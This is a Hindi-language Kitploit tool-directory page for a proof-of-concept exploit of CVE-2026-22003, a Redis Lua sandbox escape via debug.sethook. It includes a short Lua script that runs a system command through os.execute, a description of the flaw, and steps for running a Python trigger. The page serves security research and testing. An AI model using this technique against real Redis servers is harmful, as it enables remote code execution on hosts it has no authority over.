Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — CVE-2026-22003 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो debug.sethook के माध्यम से Redis Lua सैंडबॉक्स से बचकर मनमाने सिस्टम कमांड निष्पादित करने का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणडेटाबेस सुरक्षाप्रतिकूल हमला
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

CVE-2026-22003 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो debug.sethook के माध्यम से Redis Lua सैंडबॉक्स से बचकर मनमाने सिस्टम कमांड निष्पादित करने का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
16 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-22003 – debug.sethook के माध्यम से Redis Lua सैंडबॉक्स एस्केप

प्रोग्राम कोड (Lua + Python ट्रिगर)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – debug.sethook के माध्यम से Redis Lua सैंडबॉक्स एस्केप

Severity: Critical

अवलोकन

Redis Lua सैंडबॉक्स debug.sethook फ़ंक्शन को ठीक से अक्षम नहीं करता है। एक हमलावर जो Lua स्क्रिप्ट चला सकता है, एक हुक स्थापित कर सकता है जो विशेषाधिकार प्राप्त संदर्भ में निष्पादित होता है और सैंडबॉक्स से बाहर निकलकर मनमाना सिस्टम कमांड निष्पादित कर सकता है।

भेद्यता विवरण

  • प्रकार: सैंडबॉक्स एस्केप
  • प्रभाव: Redis होस्ट पर रिमोट कोड निष्पादन।
  • मूल कारण: Lua वातावरण की डिबग लाइब्रेरी सुलभ रहती है, जिससे ऐसे हुक की अनुमति मिलती है जो os.execute या समान फ़ंक्शन को कॉल कर सकते हैं।

एक्सप्लॉइट प्रदर्शन

  1. एक Redis सर्वर प्रारंभ करें (डिफ़ॉल्ट कॉन्फ़िगरेशन के साथ जो EVAL की अनुमति देता है)।
  2. एक्सप्लॉइट चलाएँ:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

/tmp/redis_escape फ़ाइल बन जाती है, जो कमांड निष्पादन को सिद्ध करती है।

टूल डाउनलोड करें